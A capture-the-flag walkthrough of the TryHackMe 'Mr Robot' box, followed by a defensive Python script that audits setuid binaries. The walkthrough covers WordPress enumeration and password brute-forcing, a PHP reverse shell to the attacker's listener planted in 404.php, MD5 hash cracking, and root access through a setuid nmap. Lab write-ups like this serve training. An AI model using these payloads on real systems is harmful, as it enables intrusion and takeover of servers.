TryHackMe: Mr Robot CTF
1. Port scan
nmap -Pn <ip>

2. All scan
nmap -A -p 22,80,443 <ip>

3. Vulnerability scan
nmap --script vuln -p 22,80,443 <ip>


This is a WordPress site. There's a robots.txt file.
4. Access HTTP site

There are commands that I can try:

prepare
fsociety
inform
question
wakeup
join

Seems like these commands are just for fun.
Viewing the source of the index page is not useful.

Inspecting elements is not useful either.

5. Access robots.txt

Download fsocity.dic
wget http://<ip>/fsocity.dic
cat fsocity.dic
This file may contain a useful password.

Count lines of the file
wc -l fsocity.dic

Sort the file and remove duplicates
sort fsocity.dic | uniq > sort_fsocity.dic
wc -l sort_fsocity.dic

Access http://<ip>/key-1-of-3.txt

6. Nikto scan
nikto -h http://<ip>/ -nossl

7. Directory scan
dirb http://<ip>

Seems like it's a WordPress site. Access one of the scanned directories.
http://<ip>/0/

View source, nothing useful.

8. WordPress scan
wpscan --url http://<ip>/0/ -et -ep -eu
Failed

Add another flag, as suggested by the tool
wpscan --url http://<ip>/0/ --wp-content-dir -et -ep -eu
There are 2 users: mich05654 and elliot.

9. Brute-forcing WordPress
wpscan --url http://<ip>/0/ --wp-content-dir -eu -P fsocity.dic

Access http://<ip>/wp-login.php
Username -> mich05654:Dylan_2791

Can’t do anything with this user.

Let’s try elliot:ER28–0652

On Dashboard -> Users. Elliot is an administrator.

Let’s get the reverse shell
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/<ip>/1234 0>&1'");
?>
Go to Appearance -> Editor -> put the code in 404.php

Create listener
nc -lvp 1234

Access 404.php

Now I have a shell.

cd /home/
ls
cat key-2-of-3.txt
I don't have permission to read key2.

Read another file. It's robot's credentials.
cat password.raw-md5

Crack with hashcat
hashcat -m 0 c3fcd3d76192e4007dfb496cca67e13b ~/Desktop/rockyou.txt
hashcat -m 0 c3fcd3d76192e4007dfb496cca67e13b ~/Desktop/rockyou.txt --show

Change to robot
su robot
Failed. I need a TTY shell.

Spawn a TTY shell
python -c 'import pty;pty.spawn("/bin/bash");'

Change to robot
su robot

Read key2
cat key-2-of-3.txt

Let’s do privilege escalation
Check if robot can run sudo.
sudo -l
I can’t run sudo.

Looking for SUID
find / -perm -u=s -type f 2>/dev/null
It's nmap!!!

nmap --interactive
!sh
id
Now I’m root.

cd /root
cat key-3-of-3.txt
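The root shell above exists only because nmap carries the setuid bit, which it never needs. As an added defender-side check (not part of this writeup), the script below walks a tree, lists setuid files and reports any whose name is not in an assumed baseline of legitimately setuid binaries; the demo tree with a setuid nmap is constructed, not a real host.

```python
import os
import stat
import tempfile

# Assumed baseline of binaries that legitimately ship setuid on a stock
# Linux install; a real audit should derive this from the package manager
# or a golden image rather than a hand-written set.
SUID_BASELINE = {"su", "sudo", "passwd", "mount", "umount", "ping"}


def find_suid(root):
    """Walk `root` and return every regular file with the setuid bit set."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


def unexpected_suid(root, baseline=SUID_BASELINE):
    """Return setuid files whose basename is not in the baseline."""
    return [p for p in find_suid(root) if os.path.basename(p) not in baseline]


def basenames(paths):
    return [os.path.basename(p) for p in paths]


def make_demo_tree():
    """Constructed demo tree: a baseline setuid passwd, a plain ls, and a
    setuid nmap mirroring the misconfiguration on the box. Returns the root."""
    root = tempfile.mkdtemp(prefix="suid_audit_")
    bindir = os.path.join(root, "usr", "local", "bin")
    os.makedirs(bindir)
    for name, mode in (("passwd", 0o4755), ("nmap", 0o4755), ("ls", 0o755)):
        path = os.path.join(bindir, name)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(path, mode)
    return root


if __name__ == "__main__":
    demo = make_demo_tree()
    for path in unexpected_suid(demo):
        print("unexpected setuid binary:", path, "-> fix with: chmod u-s", path)
```

Run against `/` as root on a real host; every hit outside the baseline should be either added to the baseline deliberately or stripped with `chmod u-s`.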
